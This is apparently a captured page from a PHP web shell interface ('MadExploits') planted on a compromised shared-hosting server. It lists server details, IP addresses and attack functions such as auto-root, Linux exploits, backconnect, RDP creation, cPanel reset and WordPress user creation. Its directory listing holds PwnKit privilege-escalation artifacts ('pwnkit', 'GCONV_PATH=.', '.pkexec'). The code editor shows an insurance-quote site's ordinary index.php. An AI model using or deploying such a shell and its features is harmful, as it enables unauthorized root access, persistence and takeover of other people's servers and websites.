Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.188.241.246
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Instly-quote /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
dashbord.php
58.95
KB
-rw-r--r--
index.php
5.1
KB
-rw-r--r--
insurance-listing.php
30.73
KB
-rw-r--r--
policy-dashboard.php
48.69
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
quote-form.php
16.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include("includes/header.php");?> <section class="hero-banner"> <div class="custom-container"> <div class="banner-wrap pos-relative"> <div class="banner-text"> <h1 class="h1-heading">health, wealth & insurance</h1> <p class="p-heading f-18">Skip the paperwork and find the perfect insurance quote with just a click. Our platform delivers tailored options instantly, saving you time and hassle. Discover your ideal coverage today!</p> <a class="buttonlink header-btn" href="#" aria-label="Get Quotes">Get Quotes</a> </div> <img class="image-banner" width="432px" src="./img/instayquote-banner.png" alt="instayquote"> </div> <div class="clientlist"> <p class="p-heading f-18">Trusted by <b>Worlds Best Insurers</b> with more than <strong>1500+</strong> policies </p> <div class="client-logo owl-carousel owl-theme"> <div class="item each-logo"> <img src="./img/expc.svg" alt="expc"> </div> <div class="item each-logo"> <img src="./img/AXA.svg" alt="Axa"> </div> <div class="item each-logo"> <img src="./img/marg.svg" alt="expc"> </div> <div class="item each-logo"> <img src="./img/generali.svg" alt="generali"> </div> <div class="item each-logo"> <img src="./img/chubb.svg" alt="chubb"> </div> <div class="item each-logo"> <img src="./img/allianz.svg" alt="allianz"> </div> <div class="item each-logo"> <img src="./img/cigna.svg" alt="cigna"> </div> <div class="item each-logo"> <img src="./img/aetna.svg" alt="aetna"> </div> </div> </div> </div> </section> <!-- Deals and offers --> <section class="counter-banner pos-relative"> <span class="bcq"></span> <div class="custom-container"> <div class="w-1095 flex-col mid-center"> <div class="text-highlight flex-js-b"> <div class="left-highlight text-right"> 88K+ </div> <div class="right-highlight"> insurance plans available </div> </div> <!-- 1 --> <div class="text-highlight flex-js-b"> <div class="left-highlight text-right"> approx 30% </div> <div class="right-highlight"> average client savings </div> </div> <!-- 1 --> <div class="text-highlight flex-js-b"> <div class="left-highlight text-right"> 10K+ </div> <div class="right-highlight"> clients served </div> </div> <!-- 1 --> </div> <div class="grids-2 max-640 mid-center"> <div class="itemsv1 text-center"> <img src="./icons/icon-search.svg" width="32" height="32" alt="search icons"> <h2 class="title-h2">get quotes instantly</h2> <p>Make your life easy, don’t have go thorough thousands of documents. Find right quote for you with just click</p> </div> <!-- 1 --> <div class="itemsv1 text-center"> <img src="./icons/icon-arrowlr.svg" width="32" height="32" alt="search icons"> <h2 class="title-h2">compare quotes</h2> <p>Make your life easy, don’t have go thorough thousands of documents. Find right quote for you with just click</p> </div> <!-- 1 --> <div class="itemsv1 text-center"> <img src="./icons/icon-email.svg" width="32" height="32" alt="search icons"> <h2 class="title-h2">get in your inbox</h2> <p>Make your life easy, don’t have go thorough thousands of documents. Find right quote for you with just click</p> </div> <!-- 1 --> <div class="itemsv1 text-center"> <img src="./icons/icon-i.svg" width="32" height="32" alt="search icons"> <h2 class="title-h2">detailed information</h2> <p>Make your life easy, don’t have go thorough thousands of documents. Find right quote for you with just click</p> </div> <!-- 1 --> </div> <div class="bannerv2"> <div class="bannertwo pos-relative"> <!-- <div class="img-banner"></div>--> <img src="./img/fm.png" height="437" alt="bannerv2"> <div class="bannerleft"> <div class="txt-banner"> <h2>your security our gurantee</h2> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p> <a class="btn-2" href="#" aria-label="browse all services">browse all services</a> </div> </div> </div> </div> </div> </section> <section class="quote-newsletter"> <div class="custom-container"> <div class="news-wrap mid-center"> <h4 class="title-h2">Join our Newsletter Today!</h4> <p class="text-info marktext">Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p> <form class="form-news mid-center" action="#"> <input class="news-input" type="email" placeholder="enter your email address" required=""> <input class="susb-btn buttonlink" type="submit" value="Submit"> </form> <p class="f-10">*Get updates once every month.</p> </div> </div> </section> <?php include("includes/footer.php");?>
Close